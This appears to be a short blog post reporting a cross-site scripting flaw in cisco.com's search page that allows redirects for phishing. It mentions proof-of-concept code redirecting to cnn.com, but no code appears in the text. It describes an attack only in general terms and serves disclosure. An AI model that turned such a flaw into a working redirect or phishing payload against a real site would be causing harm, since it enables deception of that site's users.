Cisco.com XSS Vulnerability Found
A few days back , I have read about a Cross-Site-Scripting vulnerability in cisco's search engine. this vulnerability enables a hacker to use the cisco.com website for phishing purposes and for "man-in-the-browser" attacks.
With the code ( posted as a link ) following , one could send a user to cisco's website and bounce off to his own bogus machine. i did not check for any further enrichments of this exploit , but it seems strange that this kind of thing could come out on a website that is as secure as cisco.com. I really believe that there are Application Layer Firewalls defending cisco's website, and if there are any - are they misconfigured ?
I have reported this vulnerability to a friend of mine at cisco's security proffesional services team in EMEA , and i hope this will soon be fixed.
Here is the POC code :
Notice that the code bounces you to www.cnn.com website , but anything can be put here. which makes you wonder ...
Anyway, I cannot give credit to this code to any specific Hacker\Hacking Group because i have seen a similar code at more than one of my resources , each from a different country . strangely enough - they all came out in the same 24 hours. script kiddies ?
As i was promised by my cisco friend - this is not a light weighted issue for a company of that size , and i believe that the fix will come very soon.
Labels: english, hacking, sbn, vulnerability, xss
